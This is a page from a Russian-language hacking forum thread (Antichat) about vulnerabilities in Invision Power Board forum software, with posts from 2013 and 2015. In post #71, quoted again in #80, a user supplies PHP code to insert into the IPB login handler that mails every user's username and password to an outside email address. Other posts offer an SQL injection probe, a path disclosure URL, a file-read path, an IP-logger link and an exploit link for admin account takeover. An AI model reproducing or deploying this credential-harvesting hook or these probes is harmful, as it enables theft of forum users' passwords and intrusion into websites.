HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Обзор уязвимостей IPB]
   
Ответ
Страница 8 из 9 « Первая < 4 5 6 7 8 9 >
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 25.06.2013, 12:06
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию
Цитата:
Сообщение от CoBecTb  
CoBecTb said:
Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:

Код HTML:
HTML:
$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);
 
Ответить с цитированием

  #72  
Старый 28.07.2013, 17:39
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
 
Ответить с цитированием

  #73  
Старый 28.07.2013, 18:42
Inoms
Guest
Сообщений: n/a
Провел на форуме:
23349

Репутация: 45
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL:

P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
 
Ответить с цитированием

  #74  
Старый 29.07.2013, 21:24
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
Цитата:
Сообщение от Inoms  
Inoms said:
Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
Сообщение форума

Обнаружена ошибка. Если вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.

Обнаружена ошибка:

Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова.

P.S Т.е SQL ошибки нет.
 
Ответить с цитированием

  #75  
Старый 01.08.2013, 14:19
miosaki
Guest
Сообщений: n/a
Провел на форуме:
1287

Репутация: 0
По умолчанию
Ребята как узнать айпи адресс человека на IPB форуме?

http://iplogger.ru/1fFc3.jpg

а чо за айпи логгер?
 
Ответить с цитированием

  #76  
Старый 02.08.2013, 19:39
zippy
Guest
Сообщений: n/a
Провел на форуме:
363

Репутация: 0
По умолчанию
Если на линейке 3.4.0 - 3.4.5 не стоит этот патч, то можно ли прочитать файлы форума через public/min/index.php?f=
 
Ответить с цитированием

  #77  
Старый 04.08.2013, 19:37
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
Я так смотрю под версии 3.2.х вообще ничего нету, а если и есть, то работает на дырявых и заброшенных сайтах.
 
Ответить с цитированием

  #78  
Старый 01.10.2013, 17:58
ForcePush
Guest
Сообщений: n/a
Провел на форуме:
2022

Репутация: 0
По умолчанию
Path disclosure:

Код:
Code:
admin/upgrade/index.php?app=upgrade&s[]=&section=index&do=login
2 года назад пофиксили section[], может скоро и до s[] доберутся...
 
Ответить с цитированием

  #79  
Старый 08.11.2013, 09:44
MarShaLL22
Новичок
Регистрация: 02.08.2009
Сообщений: 0
Провел на форуме:
7391

Репутация: 0
По умолчанию
Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Я так смотрю под версии 3.2.х вообще ничего нету, а если и есть, то работает на дырявых и заброшенных сайтах.
IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover Published: 2013-05-14

http://www.exploit-db.com/exploits/25441/

Пробуй. Заодно, если получится, мануал накидай небольшой, будь добр.
 
Ответить с цитированием

  #80  
Старый 27.11.2015, 01:01
sysjuk
Guest
Сообщений: n/a
Провел на форуме:
69527

Репутация: 5
По умолчанию
Цитата:
Сообщение от Br@!ns  
Br@!ns said:

в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:
Код HTML:
HTML:
$this->loginAuthenticate( $username, $email, $password );
$ipsclass_all = $username . ":" . $password;
mail('василийпупкин@gmail.com', '123', $ipsclass_all);
Ваш способ не работает, проверил только-что. Есть еще какие варианты?
 
Ответить с цитированием
Ответ
Страница 8 из 9 « Первая < 4 5 6 7 8 9 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Уязвимости CMS / форумов 167 17.10.2019 18:14
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
[Обзор уязвимостей XMBForum] [x26]VOLAND Уязвимости CMS / форумов 0 19.05.2008 13:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ